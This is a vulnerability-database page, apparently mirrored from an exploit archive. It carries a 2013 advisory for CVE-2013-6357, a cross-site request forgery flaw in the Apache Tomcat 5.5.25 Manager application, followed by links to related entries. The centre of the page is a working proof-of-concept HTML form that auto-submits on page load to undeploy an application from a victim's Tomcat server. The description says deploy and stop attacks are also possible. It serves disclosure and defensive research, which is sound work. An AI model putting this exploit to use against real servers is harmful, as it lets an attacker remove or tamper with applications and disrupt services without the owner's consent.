Lucene search
Ivano BinettiEXPLOITPACK:A2718C102CDF91481AF935458562AEF4HistoryNov 04, 2013 - 12:00 a.m.
Apache Tomcat 5.5.25 - Cross-Site Request Forgery
2013-11-0400:00:00
Ivano Binetti
20
0.001 Low
EPSS
Percentile
30.4%
Apache Tomcat 5.5.25 - Cross-Site Request Forgery
+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : Apache Tomcat 5.5.25 CSRF Vulnerabilities
# Date : 10-24-2013
# Author : Ivano Binetti (http://ivanobinetti.com)
# Author : Gianmarco Pirozzi (http://www.linkedin.com/pub/gianmarco-pirozzi/63/80b/2a5)
# Vendor site : http://tomcat.apache.org/
# Version : Apache Tomcat 5.5.25 and below (other versions could be affected)
# Tested on : Apache Tomcat 5.5.25
# Original Advisory : http://www.webapp-security.com/2013/11/apache-tomcat-5-5-25-deployundeploystartstop-applications/
# CVE-ID : CVE-2013-6357
+---------------------------------------------------------------------------------------------------------------------------------+
Summary
1)Introduction
2)Vulnerability Description
3)Exploit
3.1 Undeploy Applications
+---------------------------------------------------------------------------------------------------------------------------------+
1) Introduction
Apache Tomcat is an open source software implementation of the Java Servlet and JavaServer Pages technologies.
The Java Servlet and JavaServer Pages specifications are developed under the Java Community Process.
2) Vulnerability Description
Apache Tomcat 5.5.25 and below (other versions could be affected) is prone to a CSRF vulnerability affecting the Manager application
(which is the component utilized to start/stop/deploy/undeploy applications) in order to perform the following malicious activities:
- stop an existing application
- undeploy an existing application
- deploy a new application
In this Advisory I will only demonstate how to automatically undeploy an existing application.
3) Exploit
3.1 Undeploy Applications
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to Undeploy an Application</H2>
<form method="POST" name="form0" action="http://<tomcat_ip>:<tomcat_tcp/port>/manager/html/undeploy?path=/<name_of_application_to_undeploy>">
</form>
</body>
</html>
+----------------------------------------------------------------------------------------------------------------------------------+Related
veracode
veracode
Cross-site Request Forgery (CSRF)
2019-03-25 08:40:43
prion
prion
Cross site request forgery (csrf)
2013-11-13 15:55:00
cvelist
cvelist
CVE-2013-6357
2022-10-03 16:14:51
cve
cve
CVE-2013-6357
2022-10-03 16:14:51
openvas
openvas
Apache Tomcat <= 5.5.25 CSRF Vulnerability - Linux
2021-03-18 00:00:00
Apache Tomcat <= 5.5.25 CSRF Vulnerability - Windows
2021-03-18 00:00:00
seebug
seebug
Apache Tomcat 5.5.25θ·¨η«θ―·ζ±δΌͺι ζΌζ΄
2013-12-16 00:00:00
Apache Tomcat 5.5.25 - CSRF Vulnerabilities
2014-07-01 00:00:00
zdt
zdt
Apache Tomcat 5.5.25 CSRF Vulnerabilities
2013-11-04 00:00:00
ubuntucve
ubuntucve
CVE-2013-6357
2013-11-13 00:00:00
packetstorm
packetstorm
Apache Tomcat 5.5.25 Cross Site Request Forgery
2013-11-04 00:00:00
nvd
nvd
CVE-2013-6357
2013-11-13 15:55:04
exploitdb
exploitdb
Apache Tomcat 5.5.25 - Cross-Site Request Forgery
2013-11-04 00:00:00
nessus
nessus
RHEL 5 : tomcat5 (Unpatched Vulnerability)
2024-06-03 00:00:00
ibm
ibm